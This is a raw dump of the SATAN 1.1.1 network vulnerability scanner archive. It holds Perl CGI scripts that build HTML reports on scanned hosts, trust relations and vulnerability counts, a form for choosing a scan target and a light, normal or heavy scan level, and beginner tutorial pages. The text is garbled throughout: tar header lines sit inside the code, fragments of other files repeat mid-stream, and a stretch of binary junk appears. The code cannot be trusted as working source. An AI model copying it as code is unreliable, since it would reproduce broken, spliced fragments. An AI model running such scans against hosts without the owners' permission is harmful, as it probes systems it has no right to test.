host(s)</A> EOF } print CLIENT <<EOF; </ul> <hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> | <a href=analysis.pl> Back to SATAN Reporting and Analysis </a> </BODY> </HTML> EOF lysis.pl> Bacsatan-1.1.1/html/reporting/satan_info_class.pl...................................................... 600 . 465 . 506 . 4221 5737241131 14513. ........................................................................................ ................................................................................................................................................................................................................................................................. ...........# # Report services and host counts. # print CLIENT <<EOF; <HTML> <HEAD> <title> Host Tables - by Class of Service </title> <LINK REV="made" HREF="mailto:satan\@fish.com"> </HEAD> <BODY> <H1><IMG SRC=$HTML_ROOT/images/satan.gif> Host Tables - by Class of Service </H1> <hr> EOF &make_service_info() ; if (sizeof(*servers) > 0) { print CLIENT "<p> <h3> Number of server systems (vulnerable/total) </h3> <ul>\n"; for (sort keys %servers) { .# Mask possible blanks or slashes in service names. .($_service = $_) =~ tr / \//?!/; .$_dot = $server_severities{$_} ? "reddot" : "blackdot"; .$_alt = $server_severities{$_} ? "*" : "-"; .if ($server_counts{$_} > 0) { . print CLIENT <<EOF; . <dt><IMG SRC=$HTML_ROOT/dots/$_dot.gif ALT="$_alt"> . <a href="satan_info_servers.pl,$_service,"> $_</a> . ($server_severities{$_}/$server_counts{$_}) EOF #.} else { #. print CLIENT <<EOF; #. <dt><IMG SRC=$HTML_ROOT/dots/blackdot.gif ALT="-"> $_ #EOF .} } print CLIENT "</ul>\n"; } if (sizeof(*clients) > 0) { print CLIENT "<p> <h3> Number of client systems (vulnerable/total) </h3> <ul>\n"; for (sort keys %clients) { .# Mask possible blanks or slashes in service names. .($_service = $_) =~ tr / \//?!/; .$_dot = $client_severities{$_} ? "reddot" : "blackdot"; .$_alt = $client_severities{$_} ? "*" : "-"; .if ($client_counts{$_} > 0) { . print CLIENT <<EOF; . <dt><IMG SRC=$HTML_ROOT/dots/$_dot.gif ALT="$_alt"> . <a href="satan_info_clients.pl,$_service,"> $_</a> . ($client_severities{$_}/$client_counts{$_}) EOF #.} else { #. print CLIENT <<EOF; #. <dt><IMG SRC=$HTML_ROOT/dots/blackdot.gif ALT="-"> $_ #EOF .} } print CLIENT "</ul>\n"; } if (sizeof(*servers) > 0 || sizeof(*clients) > 0) { print CLIENT <<EOF; .<strong>Note: hosts may appear in multiple categories. </strong> .<HL> .<strong>Service types with a red dot next to them have a vulnerable host contained within</strong> EOF } else { print CLIENT <<EOF; .No service information found. EOF } print CLIENT <<EOF <hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> | <a href=analysis.pl> Back to SATAN Reporting and Analysis </a> </BODY> </HTML> EOF groups and their respective host members. # $_sort_sub = "sort_alpha" if $_sort_sub eq ""; for $_group (sort $_sort_toc keys %_sort_group) { .if ($_sort_title) { ..print CLIENT <<EOF; ..<h3> ..<a name="$_group"> ..$_sort_title: EOF ..if ($_not_linked{$_group}) { ...print CLIENT <<EOF; ...$_group. EOF ..} else { ...($_GROUP = $_group) =~ tr / \//?!/; ...print CLIsatan-1.1.1/html/reporting/satan_info_host.pl....................................................... 600 . 465 . 506 . 6170 5737240670 14377. ......................................................................................... ................................................................................................................................................................................................................................................................. ..........# # Show information about a specific host. # ($_host) = split(/,/, $html_script_args); ($_type = $hosttype{$_host}) =~ tr / \//?!/; print CLIENT <<EOF; <HTML> <HEAD> <title> Results - $_host </title> <LINK REV="made" HREF="mailto:satan\@fish.com"> </HEAD> <BODY> <H1><IMG SRC=$HTML_ROOT/images/satan.gif> Results - $_host </H1> <hr> <h3>General host information:</h3> <ul> EOF # # Refresh the host type and service tables. # &make_hosttype_info(); &make_service_info(); &make_subnet_info(); $_exists = 0; if (exists($hosttype{$_host})) { .print CLIENT <<EOF; .<li>Host type: <A HREF="satan_info_OStype.pl,$_type,">$hosttype{$_host}</A> EOF .$_exists = 1; } if (exists($server_info{$_host})) { .for (sort split(/\n/, $server_info{$_host})) { ..# Mask blanks and slashes ..($_service = $_) =~ tr / \//?!/; ..print CLIENT <<EOF; ..<li> <A HREF="satan_info_servers.pl,$_service,"> $_ </A> server EOF .} .$_exists = 1; } if (exists($client_info{$_host})) { .for (sort split(/\n/, $client_info{$_host})) { ..# Mask blanks and slashes ..($_service = $_) =~ tr / \//?!/; ..print CLIENT <<EOF; ..<li> <A HREF="satan_info_clients.pl,$_service,"> $_ </A> client EOF .} .$_exists = 1; } if (exists($all_hosts{$_host})) { .($_subnet = $all_hosts{$_host}{IP}) =~ s/\.[^.]*$//; .print CLIENT <<EOF; .<li> Subnet <A HREF="satan_results_subnet.pl,$_subnet,"> $_subnet </A> EOF .$_exists = 1; } if (exists($total_trustee_count{$_host})) { .$_count = split(/\s+/, $total_trustee_names{$_host}); .print CLIENT <<EOF; .<li> $_count .<A HREF="satan_results_trusting.pl,$_host,trustee_type,"> Trusting host(s) </a> EOF .$_exists = 1; } if (exists($total_trusted_count{$_host})) { .$_count = split(/\s+/, $total_trusted_names{$_host}); .print CLIENT <<EOF; .<li> $_count .<A HREF="satan_results_trusted.pl,$_host,trusted_type,"> Trusted host(s) </a> EOF .$_exists = 1; } if (exists($all_hosts{$_host}) && defined($all_hosts{$_host}{'attack'})) { .@_level = ('none', 'light', 'normal', 'heavy', 'all out'); .print CLIENT <<EOF; .<li> Scanning level: @_level[1 + $all_hosts{$_host}{'attack'}] EOF .$_exists = 1; } if (exists($all_hosts{$_host}) && defined($all_hosts{$_host}{'time'}) .&& $all_hosts{$_host}{'time'} > 1) { .$_time = &ctime($all_hosts{$_host}{'time'}); .print CLIENT <<EOF; .<li> Last scan: $_time EOF .$_exists = 1; } print CLIENT "</ul>\n"; if (exists($severity_host_type_info{$_host})) { .print CLIENT "<h3>Vulnerability information:</h3><ul>\n"; .for (keys %{$severity_host_type_info{$_host}}) { ..($_tutorials = $_) =~ tr / /_/; ..for (sort split(/\n/, $severity_host_type_info{$_host}{$_})) { ...&satan_split($_); ...print CLIENT <<EOF; .<li> <A HREF="$HTML_ROOT/tutorials/vulnerability/$_tutorials.html">$text</A> EOF ..} .} .$_exists = 1; } print CLIENT <<EOF; </ul> EOF if ($_exists) { .print CLIENT <<EOF; .<h3>Actions:</h3> .<ul> .<li> <A HREF="$HTML_SERVER/running/satan_run_form.pl,$_host,">Scan this host</a> .</ul> EOF } else { .print CLIENT <<EOF; .<h3>No information found on host $_host.</h3> EOF } print CLIENT <<EOF; <hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> | <a href=analysis.pl> Back to SATAN Reporting and Analysis </a> </BODY> </HTML> EOF </a> </BODY> </HTML> EOF groups and their respective host members. # $_sort_sub = "sort_alpha" if $_sort_sub eq ""; for $_group (sort $_sort_toc keys %_sort_group) { .if ($_sort_title) { ..print CLIENT <<EOF; ..<h3> ..<a name="$_group"> ..$_sort_title: EOF ..if ($_not_linked{$_group}) { ...print CLIENT <<EOF; ...$_group. EOF ..} else { ...($_GROUP = $_group) =~ tr / \//?!/; ...print CLIsatan-1.1.1/html/reporting/satan_info_OStype.pl..................................................... 600 . 465 . 506 . 2211 5737240633 14634. ......................................................................................... ................................................................................................................................................................................................................................................................. ..........# # List all hosts that run a specific operating system version. # &make_hosttype_info(); ($_TYPE, $_sort_order) = split(/,/, $html_script_args); ($_type = $_TYPE) =~ tr/?!/ \//; print CLIENT <<EOF; <HTML> <HEAD> <title> Host Table - $_type Systems </title> <LINK REV="made" HREF="mailto:satan\@fish.com"> </HEAD> <BODY> <H1><IMG SRC=$HTML_ROOT/images/satan.gif> Host Table - $_type Systems </H1> <hr> <h3> $systype_severities{$_type} Vulnerable/$systype_counts{$_type} total. Vulnerability counts in parentheses. </h3> <H4> Sort hosts by: <a href="satan_info_OStype.pl,$_TYPE,name,">name</a> | <a href="satan_info_OStype.pl,$_TYPE,domain,">domain</a> | <a href="satan_info_OStype.pl,$_TYPE,subnet,">subnet</a> | <a href="satan_info_OStype.pl,$_TYPE,severity,">problem count</a> | <a href="satan_info_OStype.pl,$_TYPE,severity_type,">problem type</a> </H4> </FORM> EOF @_hosts = split(/\n/, $hosts_by_systype{$_type}); do "$html_root/reporting/sort_hosts.pl"; print CLIENT $@ if $@; print CLIENT <<EOF; <hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> | <a href=analysis.pl> Back to SATAN Reporting and Analysis </a> </BODY> </HTML> EOF $_tutorials.html">$text</A> EOF ..} .} .$_exists = 1; } print CLIENT <<EOF; </ul> EOF if ($_exists) { .print CLIENT <<EOF; .<h3>Actions:</h3> .<ul> .<li> <A HREF="$HTML_SERVER/running/satan_run_form.pl,$_host,">Scan this host</a> .</ul> EOF } else { .print CLIENT <<EOF; .<h3>No information found on host $_host.</h3> EOF } print CLIENT <<EOF; <hr> <a href=$HTML_STARTPAGE>satan-1.1.1/html/reporting/satan_info_clients.pl.................................................... 600 . 465 . 506 . 2267 5737240652 15066. ........................................................................ ................................................................................................................................................................................................................................................................. ...........................# # List hosts that use a specific service. # ($_SERVICE, $_sort_order) = split(/,/, $html_script_args); ($_service = $_SERVICE) =~ tr/?!/ \//; print CLIENT <<EOF; <HTML> <HEAD> <title> Host Table - $_service Clients</title> <LINK REV="made" HREF="mailto:satan\@fish.com"> </HEAD> <BODY> <H1><IMG SRC=$HTML_ROOT/images/satan.gif> Host Table - $_service Clients</H1> <hr> <h3> $client_severities{$_service} Vulnerable/$client_counts{$_service} total. Vulnerability counts in parentheses. </h3> <H4> Sort hosts by: <a href="satan_info_clients.pl,$_SERVICE,name,">name</a> | <a href="satan_info_clients.pl,$_SERVICE,domain,">domain</a> | <a href="satan_info_clients.pl,$_SERVICE,type,">system type</a> | <a href="satan_info_clients.pl,$_SERVICE,subnet,">subnet</a> | <a href="satan_info_clients.pl,$_SERVICE,severity,">problem count</a> | <a href="satan_info_clients.pl,$_SERVICE,severity_type,">problem type</a> </H4> </FORM> EOF @_hosts = keys %{$clients{$_service}}; do "$html_root/reporting/sort_hosts.pl"; print CLIENT $@ if $@; print CLIENT <<EOF; <hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> | <a href=analysis.pl> Back to SATAN Reporting and Analysis </a> </BODY> </HTML> EOF ts = 1; } print CLIENT <<EOF; </ul> EOF if ($_exists) { .print CLIENT <<EOF; .<h3>Actions:</h3> .<ul> .<li> <A HREF="$HTML_SERVER/running/satan_run_form.pl,$_host,">Scan this host</a> .</ul> EOF } else { .print CLIENT <<EOF; .<h3>No information found on host $_host.</h3> EOF } print CLIENT <<EOF; <hr> <a href=$HTML_STARTPAGE>satan-1.1.1/html/reporting/satan_info_host_action.pl................................................ 600 . 465 . 506 . 1637 5737241154 15735. ........................................................................ ................................................................................................................................................................................................................................................................. ...........................# # Translate HMTL arg list form. # if ($_query_host eq "") { print CLIENT <<EOF; <HTML> <HEAD> <title>Error - No Host </title> <LINK REV="made" HREF="mailto:satan\@fish.com"> </HEAD> <BODY> <H1><IMG SRC=$HTML_ROOT/images/satan.gif> Error - No Host </H1> <hr> <h2>Error: no host name specified. Try again.</h2> EOF } else { $_query_host =~ tr /A-Z/a-z/; $_query_host = &getfqdn($_query_host) if (&getfqdn($_query_host)); if (defined($all_hosts{$_query_host})) { .$html_script_args = $_query_host; .do "$html_root/reporting/satan_info_host.pl"; .print CLIENT $@ if $@; } else { .print CLIENT <<EOF; <HTML> <HEAD> <title>Error - Unknown Host </title> <LINK REV="made" HREF="mailto:satan\@fish.com"> </HEAD> <BODY> <H1><IMG SRC=$HTML_ROOT/images/satan.gif> Error - Unknown Host </H1> <hr> <h2>Error: unknown host name specified: $_query_host. Try again.</h2> EOF } } print CLIENT <<EOF </BODY> </HTML> EOF > EOF @_hosts = keys %{$clients{$_service}}; do "$html_root/reporting/sort_hosts.pl"; print CLIEsatan-1.1.1/html/reporting/satan_results_domain.pl.................................................. 600 . 465 . 506 . 2113 5737240744 15432. ........................................................................................... ................................................................................................................................................................................................................................................................. ........# # List all hosts in an internet domain # ($_domain, $_sort_order) = split(/,/, $html_script_args); print CLIENT <<EOF; <HTML> <HEAD> <title> Host Table - Domain $_domain</title> <LINK REV="made" HREF="mailto:satan\@fish.com"> </HEAD> <BODY> <H1><IMG SRC=$HTML_ROOT/images/satan.gif> Host Table - Domain $_domain</h1> <hr> <h3> $domain_severities{$_domain} Vulnerable/$domain_count{$_domain} total. Vulnerability counts in parentheses. </h3> <H4> Sort hosts by: <A HREF="satan_results_domain.pl,$_domain,name,">name</a> | <A HREF="satan_results_domain.pl,$_domain,type,">system type</a> | <A HREF="satan_results_domain.pl,$_domain,subnet,">subnet</a> | <A HREF="satan_results_domain.pl,$_domain,severity,">problem count</a> | <A HREF="satan_results_domain.pl,$_domain,severity_type,">problem type</a> </H4> EOF @_hosts = split(/\s+/, $all_domains{$_domain}); do "$html_root/reporting/sort_hosts.pl"; print CLIENT $@ if $@; print CLIENT <<EOF; <hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> | <a href=analysis.pl> Back to SATAN Reporting and Analysis </a> </BODY> </HTML> EOF SATAN start page </a> | <a href=analysis.pl> Back to SATAN Reporting and Analysis </a> </BODY> </HTML> EOF ts = 1; } print CLIENT <<EOF; </ul> EOF if ($_exists) { .print CLIENT <<EOF; .<h3>Actions:</h3> .<ul> .<li> <A HREF="$HTML_SERVER/running/satan_run_form.pl,$_host,">Scan this host</a> .</ul> EOF } else { .print CLIENT <<EOF; .<h3>No information found on host $_host.</h3> EOF } print CLIENT <<EOF; <hr> <a href=$HTML_STARTPAGE>satan-1.1.1/html/reporting/satan_info_trusted.pl.................................................... 600 . 465 . 506 . 1761 5737240722 15113. ........................................................................ ................................................................................................................................................................................................................................................................. ...........................# # Report which hosts are trusted how many times # sub sort_numerically { .$total_trustee_count{$b} <=> $total_trustee_count{$a}; } print CLIENT <<EOF; <HTML> <HEAD> <title> Trust - Trusted Hosts</title> <LINK REV="made" HREF="mailto:satan\@fish.com"> </HEAD> <BODY> <H1><IMG SRC=$HTML_ROOT/images/satan.gif> Trust - Trusted Hosts</H1> <hr> <h3>Trusted hosts (by number of trusting hosts).</h3> <ul> EOF &make_severity_info(); for (sort sort_numerically keys %total_trustee_count) { .$_dot = exists($severity_host_type_info{$_}) ? "reddot" : "blackdot"; .$_alt = exists($severity_host_type_info{$_}) ? "*" : "-"; .print CLIENT <<EOF; .<dt><IMG SRC=$HTML_ROOT/dots/$_dot.gif ALT="$_alt"> .<A HREF="satan_info_host.pl,$_,">$_</A> - .<A HREF="satan_results_trusting.pl,$_,trustee_type,"> $total_trustee_count{$_} host(s)</A> EOF } print CLIENT <<EOF; </ul> <hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> | <a href=analysis.pl> Back to SATAN Reporting and Analysis </a> </BODY> </HTML> EOF </a> | <a href=satan-1.1.1/html/reporting/satan_results_trusted.pl................................................. 600 . 465 . 506 . 2277 5737240757 15674. ............................................................................................. ................................................................................................................................................................................................................................................................. ......# # List hosts that this host trusts # ($_TRUSTEE, $_sort_order) = split(/,/, $html_script_args); ($_trustee = $_TRUSTEE) =~ tr/?!/ \//; print CLIENT <<EOF; <HTML> <HEAD> <title> Trust - $_trustee</title> <LINK REV="made" HREF="mailto:satan\@fish.com"> </HEAD> <BODY> <H1><IMG SRC=$HTML_ROOT/images/satan.gif> Trust - $_trustee</h1> <hr> <h3>Hosts trusted by $_trustee (vulnerability counts). </h3> <H4> Sort hosts by: <a href="satan_results_trusted.pl,$_TRUSTEE,name,">name</a> | <a href="satan_results_trusted.pl,$_TRUSTEE,domain,">domain</a> | <a href="satan_results_trusted.pl,$_TRUSTEE,type,">system type</a> | <a href="satan_results_trusted.pl,$_TRUSTEE,subnet,">subnet</a> | <a href="satan_results_trusted.pl,$_TRUSTEE,severity,">problem count</a> | <a href="satan_results_trusted.pl,$_TRUSTEE,severity_type,">problem type</a> | <a href="satan_results_trusted.pl,$_TRUSTEE,trusted_type,">trust type</a> </H4> EOF @_hosts = split(/\s+/, $total_trusted_names{$_trustee}); do "$html_root/reporting/sort_hosts.pl"; print CLIENT $@ if $@; print CLIENT <<EOF; <hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> | <a href=analysis.pl> Back to SATAN Reporting and Analysis </a> </BODY> </HTML> EOF atan_info_host.pl,$_,">$_</A> - .<A HREF="satan_results_trusting.pl,$_,trustee_type,"> $total_trustee_count{$_} host(s)</A> EOF } print CLIENT <<EOF; </ul> <hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> | <a href=analysis.pl> Back to SATAN Reporting and Analysis </a> </BODY> </HTML> EOF </a> | <a href=satan-1.1.1/html/reporting/satan_results_trusting.pl................................................ 600 . 465 . 506 . 2325 5737240764 16051. ............................................................................................. ................................................................................................................................................................................................................................................................. ......# # List hosts that trust this host by trust relation # ($_TRUSTED, $_sort_order) = split(/,/, $html_script_args); ($_trusted = $_TRUSTED) =~ tr/?!/ \//; print CLIENT <<EOF; <HTML> <HEAD> <title> Trust - $_trusted</title> <LINK REV="made" HREF="mailto:satan\@fish.com"> </HEAD> <BODY> <H1><IMG SRC=$HTML_ROOT/images/satan.gif> Trust - $_trusted</h1> <hr> <h3>Hosts trusting $_trusted (vulnerability counts). </h3> <H4> Sort hosts by: <a href="satan_results_trusting.pl,$_TRUSTED,name,">name</a> | <a href="satan_results_trusting.pl,$_TRUSTED,domain,">domain</a> | <a href="satan_results_trusting.pl,$_TRUSTED,type,">system type</a> | <a href="satan_results_trusting.pl,$_TRUSTED,subnet,">subnet</a> | <a href="satan_results_trusting.pl,$_TRUSTED,severity,">problem count</a> | <a href="satan_results_trusting.pl,$_TRUSTED,severity_type,">problem type</a> | <a href="satan_results_trusting.pl,$_TRUSTED,trustee_type,">trust type</a> </H4> EOF @_hosts = split(/\s+/, $total_trustee_names{$_trusted}); do "$html_root/reporting/sort_hosts.pl"; print CLIENT $@ if $@; print CLIENT <<EOF; <hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> | <a href=analysis.pl> Back to SATAN Reporting and Analysis </a> </BODY> </HTML> EOF </ul> EOF if ($_exists) { .print CLIENT <<EOF; .<h3>Actions:</h3> .<ul> .<li> <A HREF="$HTML_SERVER/running/satan_run_form.pl,$_host,">Scan this host</a> .</ul> EOF } else { .print CLIENT <<EOF; .<h3>No information found on host $_host.</h3> EOF } print CLIENT <<EOF; <hr> <a href=$HTML_STARTPAGE>satan-1.1.1/html/satan.pl........................................................................... 600 . 465 . 506 . 3164 5742422414 10310. ........................................................................ ................................................................................................................................................................................................................................................................. ...........................print <<EOF <HTML> <HEAD> <title>SATAN</title> <LINK REV="made" HREF="mailto:satan\@fish.com"> </HEAD> <BODY> <H1> <a href="images/satan-full.gif"> <IMG SRC="images/satan.gif"></a> SATAN Control Panel</H1> <H2>(Security Administrator Tool for Analyzing Networks)</H2> <HR> <UL> <dt><IMG SRC="dots/blackdot.gif" ALT="*"> .<A HREF="$HTML_SERVER/data/satan_data_form.pl"><strong> SATAN Data Management</strong></A> <p> <dt><IMG SRC="dots/blackdot.gif" ALT="*"> .<A HREF="$HTML_SERVER/running/satan_run_form.pl"><STRONG> SATAN Target selection</STRONG></A> <p> <dt><IMG SRC="dots/blackdot.gif" ALT="*"> .<A HREF="$HTML_SERVER/reporting/analysis.pl"><STRONG> SATAN Reporting & Data Analysis</STRONG></A> <p> <dt><IMG SRC="dots/blackdot.gif" ALT="*"> .<A HREF="$HTML_SERVER/admin/satan_cf_form.pl"><strong> SATAN Configuration Management</strong></A> <p> <dt><IMG SRC="dots/blackdot.gif" ALT="*"> .<A HREF="satan_documentation.html"><strong> SATAN Documentation</strong></A> <p> <dt><IMG SRC="dots/blackdot.gif" ALT="*"> .<A HREF="docs/FAQ.html#trouble"><strong> SATAN Troubleshooting</strong></A> </UL> <HR> <UL> <p> <dt><IMG SRC="dots/reddot.gif" ALT="*"> .<A HREF=ftp://ftp.win.tue.nl/pub/security/index.html><strong> Getting the Latest version of SATAN</strong></A> <dt><IMG SRC="dots/pinkdot.gif" ALT="*"> .<A HREF=name.html><strong> Couldn't you call it something other than "SATAN"?</strong></A> <dt><IMG SRC="dots/blackdot.gif" ALT="*"> .<A HREF=docs/artwork.html><strong> 'Bout the SATAN image</strong></A> <dt><IMG SRC="dots/purpledot.gif" ALT="*"> .<A HREF=docs/authors.html><strong> 'Bout the authors</strong></A> <p> </UL> </BODY> </HTML> EOF t page </a> | <a href=analysis.pl> Back to SATAN Reporting and Analysis </a> </BODY> </HTML> EOF </ul> EOF if ($_exists) { .print CLIENT <<EOF; .<h3>Actions:</h3> .<ul> .<li> <A HREF="$HTML_SERVER/running/satan_run_form.pl,$_host,">Scan this host</a> .</ul> EOF } else { .print CLIENT <<EOF; .<h3>No information found on host $_host.</h3> EOF } print CLIENT <<EOF; <hr> <a href=$HTML_STARTPAGE>satan-1.1.1/html/running/........................................................................... 700 . 465 . 506 . 0 5742521544 10236. ........................................................................ ................................................................................................................................................................................................................................................................. ...........................satan-1.1.1/html/running/satan_run_action.pl........................................................ 600 . 465 . 506 . 3350 5737241340 14207. .......................................................................... ................................................................................................................................................................................................................................................................. .........................# # Collect data and keep the user informed. # # # Make sure they specified a host at all. # if ($primary_target eq "") { .print CLIENT <<EOF <HTML> <HEAD> <TITLE>Error - Missing input </TITLE> <LINK REV="made" HREF="mailto:satan\@fish.com"> </HEAD> <BODY> <H1><IMG SRC=$HTML_ROOT/images/satan.gif> Error - Missing input </H1> <hr> No primary host or network was specified. </BODY> </HTML> EOF ; .die "\n"; } # # If a host name was specified look up the official name. # if ($primary_target !~ /^\d+\./) { .$tmp_target = &getfqdn(&get_host_name(&get_host_addr($primary_target))); .if ($tmp_target eq "") { ..print CLIENT <<EOF <HTML> <HEAD> <TITLE>Error - Unknown host</TITLE> <LINK REV="made" HREF="mailto:satan\@fish.com"> </HEAD> <BODY> <H1><IMG SRC=$HTML_ROOT/images/satan.gif> Error - Unknown host</H1> <hr> Unable to look up host <TT> $primary_target </TT> </BODY> </HTML> EOF ;. ..die "\n"; .} .$primary_target = $tmp_target; } # # Primary target is OK, start data collection. # print CLIENT <<EOF <HTML> <HEAD> <TITLE>SATAN data collection </TITLE> <LINK REV="made" HREF="mailto:satan\@fish.com"> </HEAD> <BODY> <H1><IMG SRC=$HTML_ROOT/images/satan.gif> SATAN data collection</H1> <hr> <B>Data collection in progress...</B> <P> EOF ; $_live_hosts = $live_hosts; &run_satan($primary_target); $_live_hosts = $live_hosts - $_live_hosts; print CLIENT <<EOF; <P> <B>Data collection completed ($_live_hosts host(s) visited).</B> <hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> | <a href=../reporting/analysis.pl>Continue with report and analysis</a> EOF if (&getfqdn($tmp_target)) { .print CLIENT <<EOF; | <a href="../reporting/satan_info_host.pl,$tmp_target,"> View primary target results</a> EOF } print CLIENT <<EOF </BODY> </HTML> EOF fish.com"> </HEAD> <BODY> <H1><IMG SRC=$HTML_ROOT/images/satan.gif> Error - Missing input </H1> <hr> No primary host or network was specified. </BODY> </HTML> EOF ; .die "\n"; } # # If a host name was specified look up the official name. # if ($primary_target !~ /^\d+\./) { .$tmsatan-1.1.1/html/running/satan_run_form.pl.......................................................... 600 . 465 . 506 . 3531 5740247767 13713. ................................................................................................. ................................................................................................................................................................................................................................................................. ..# # Display a FORM to select the primary target and to give the user a chance to # override some defaults. # ($_host) = split(/,/, $html_script_args); # # First figure out what radio buttons etc. should be "on". Note: the # variables below are global. Perhaps we should hide in our own package # name space. # @check_subnets = ();.$check_subnets[$attack_proximate_subnets] = "checked"; @check_level = ();.$check_level[$attack_level] = "checked"; # # In case the primary target has not yet been set. # $primary_target = $THIS_HOST unless $primary_target; $_host = $primary_target unless $_host; print CLIENT <<EOF <HTML> <HEAD> <TITLE>SATAN target selection</TITLE> <LINK REV="made" HREF="mailto:satan\@fish.com"> </HEAD> <BODY> <H1><IMG SRC=$HTML_ROOT/images/satan.gif> SATAN target selection</H1> <hr> <FORM METHOD=POST ACTION="satan_run_action.pl"> <h3> Primary target selection </h3> Primary target host or network, e.g. <tt>$THIS_HOST</tt>: <INPUT SIZE="48" NAME="primary_target" Value="$_host"> <P> <DL compact> <DT><DD><input type=radio name="attack_proximate_subnets" value="0" $check_subnets[0]> .Scan the target host only. <DT><DD><input type=radio name="attack_proximate_subnets" value="1" $check_subnets[1]> .Scan all hosts in the primary (i.e. the target's) subnet. </DL> <HR> <h3> Scanning level selection </h3> Should SATAN do a light scan, a normal scan, or should it hit the (primary) target(s) at full blast? <P> <DL compact> <DT><DD><input type=radio name="attack_level" value="0" $check_level[0]> .Light <DT><DD><input type=radio name="attack_level" value="1" $check_level[1]> .Normal (may be detected even with minimal logging) <DT><DD><input type=radio name="attack_level" value="2" $check_level[2]> .Heavy (error messages may appear on systems consoles) </DL> <HR> <INPUT TYPE="submit" VALUE=" Start the scan "> </FORM> </BODY> </HTML> EOF me="$_group"> ..$_sort_title: EOF ..if ($_not_linked{$_group}) { ...print CLIENT <<EOF; ...$_group. EOF ..} else { ...($_GROUP = $_group) =~ tr / \//?!/; ...print CLIsatan-1.1.1/html/tutorials/......................................................................... 700 . 465 . 506 . 0 5742521545 10605. ......................................................................................... ................................................................................................................................................................................................................................................................. ..........satan-1.1.1/html/tutorials/first_time/.............................................................. 700 . 465 . 506 . 0 5742521545 12752. ........................................................................................... ................................................................................................................................................................................................................................................................. ........satan-1.1.1/html/tutorials/first_time/analyzing.html................................................ 600 . 465 . 506 . 5273 5737553346 15742. ............................................................................................. ................................................................................................................................................................................................................................................................. ......<title>Analyzing SATAN output</title> <H1><IMG SRC="../../images/satan.gif"> Analyzing SATAN output</H1> <HR> <p> Learning how to effectively interpret the results of a SATAN scan is the most difficult part about using SATAN. This is partly because there is no "correct" security level. "Good" security is very much dependent on the policies and concerns of the site or system involved. <p> In addition, some of the concepts used in SATAN (such as why trust and network information can be so damaging) and many of the options that can be chosen (like proximity, proximity descent, attack filters, etc.) will not be very familiar to many system administrators. It is important to read and understand the documentation to use the tool effectively. <p> In the reports if there is a host listed with a red dot (<IMG SRC="../../dots/reddot.gif">) next to it, that means the host has a vulnerability that could compromise it. A black dot (<IMG SRC="../../dots/blackdot.gif">) means that no vulnerabilites have been found for that particular host yet. Clicking on hyperlinks will give you more information on that host, network, piece of information, or vulnerability, just as expected. <p> From the control panel in the HTML interface, select <I>SATAN Reporting & Data Analysis</I>. You will then be prompted with a wealth of choices; when first learning to use the tool, the <I>Vulnerabilities</I> section will probably be the one of the most immediate interest. In that section, the <I>By Approximate Danger Level</I> link is a good place to start. If you find no warnings there, congratulations! Note that this does <U>NOT</U> mean that your host is secure - it simply means that SATAN could not find any problems. You might try scanning your targets at a higher level and check this again; in any case, you should investigate the other categories (Hosts and Trust) in the reporting page. <p> The best way to learn what SATAN can do for you is by using it - scanning networks and examining the results with the Report and Analysis tools can reveal interesting things about your network. Remember, anyone has access to this informtion, so act accordingly! <p> Reading, or at least browsing through the full documentation is strongly recommended - this tutorial merely covered the very basic capabilities of SATAN. There are a wealth of possible options that can be used to unleash SATAN's full potential. Be careful, however, because it is easy to unwittingly make your neighbors think that you're trying to attack them with the scans - <U>always</U> be certain that you have permission to scan any potential hosts that you're thinking of testing. <hr> <a href=../../satan_documentation.html> Back to the SATAN Documentation Index</a> -Σ╜Θ╬.fò¿i╤qSz⌐▌°«ér.t;.U├┌╝.┌─L.╡{X.xït╦W╗QG┴╜è .├ó}Nα¼.^┼ÿm╡╥├±.W...▐Mÿ[╠ç▐÷─.¥ªqî+d.÷LM.«┬.+.ï╤┼≈2½▌.îo.î└σ¡╟ó╒r.w{-.G─.M.╢0%£.E>.H∙╟h.╗,µ..f╞%gSúB.Γâ.¼║C⌐Ωs├ê╚4/ Σ═╫\^┼ÑJ╙<+I╛H⌠]╗.╣¥⌡8]KmjJτ╓∞ß=╙╓╣«k6║.φß(lVτNw¼╧Vδ.╧╪ÿ╦¬╡÷C÷M┌.¬α╓-\σb·nOO|vUy≤O└°lI┼|çihM╡7∙Θß╢eëß╛8ß-╛≡É/.vE>ßûq╛ë..:▌.╛α▓╖v▌%ù=í║εUù═U┼╬┴á»TB.$┐ïíú┼▒;ƒ .╪satan-1.1.1/html/tutorials/first_time/learning_to_use.html.......................................... 600 . 465 . 506 . 2064 5737561004 17104. ................................................................................................... ................................................................................................................................................................................................................................................................. <title>Learning how to use SATAN</title> <H1><IMG SRC="../../images/satan.gif"> SATAN Tutorials</H1> <H2>(Learning how to use SATAN)</H2> <HR> <p> It can be very easy to use SATAN for the first time; it's basic capabilities are very simple to use and to understand. To start using it, there are only three basic steps to follow: <p> <OL> <li> <A HREF="make.html"> .Making a working copy of the program</a> <li> <A HREF="scanning.html"> .Scanning your host or networks</a> <li> <A HREF="analyzing.html"> .Analyzing the output</a> </OL> <p> <STRONG> Remember - you should run SATAN as "root"!</STRONG> Some of the scanning tests require <I>root</I> privileges to run. <p> After trying it once, you should read through the rest of the documentation to learn how to use it to its fullest extent. Reading the <A HREF="../../docs/user_interface.html#tricky-implications"> Hints, Further tricky security implications, or Getting The Big Picture (tm)</A> Would be a <STRONG>very</STRONG> good idea. <hr> <a href=../../satan_documentation.html> Back to the Documentation TOC</a> ll give you more information on that host, network, piece of information, or vulnerability, just as expected. <p> From the control panel in the HTML interface, select <I>SATAN Reporting & Data Analysis</I>. You will then be prompted with a wealth of choices; when first learning to use the tool, the <I>Vulnerabilities</I> section will probably be the one of the most immediate interest. In that section, the <I>By Approximate Danger Level</I> link is a goodsatan-1.1.1/html/tutorials/first_time/make.html..................................................... 600 . 465 . 506 . 1446 5737553410 14651. ................................................ ................................................................................................................................................................................................................................................................. ...................................................<title>Creating your own copy of SATAN</title> <H1><IMG SRC="../../images/satan.gif"> Creating your own copy of SATAN</H1> <HR> <p> There are only two steps to follow; from your Un*x 